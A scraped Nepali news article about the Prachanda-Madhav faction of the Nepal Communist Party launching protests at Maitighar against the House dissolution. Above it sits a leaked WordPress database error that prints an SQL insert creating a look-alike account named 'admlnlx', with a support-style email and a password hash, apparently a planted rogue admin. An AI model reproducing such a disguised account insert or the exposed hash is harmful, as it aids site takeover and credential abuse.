WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BagFpUq.5KndFmu8fSXO/PXsjcPjo50', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 16:21:22', '', 'admlnlx', 'admlnlx')
काठमाडौं । प्रतिनिधिसभा विघटन विरुद्ध नेपाल कम्युनिष्ट पार्टी (नेकपा) प्रचण्ड-माधब समूहले आन्दोलन सुरु गरेको छ ।
शुक्रबार बिहानबाट माइतीघरबाट सुरु भएको आन्दोलनको नेतृत्व अध्यक्षद्धय पुष्पकमल दाहाल प्रचण्ड र माधवकुमार नेपाल आफैले गरेका छन् । अध्यक्षद्धय सहित वरिष्ठ नेता झलनाथ खनाल, प्रवत्ता नारायणकाजी श्रेष्ठ लगायतका शिर्ष नेताहरु छातीमा ‘हामी यहाँ छौं’ टाँसेर माइतीघरको सडकमा बसेका छन् ।
बिहीबार बसेको केन्द्रीय कमिटी बैठकले शुक्रबारबाट दैनिक रूपमा कुनै न कुनै प्रकारको विरोध गर्ने र १४ गते देशभर विरोध प्रदर्शन गर्ने निर्णय गरेको थियो ।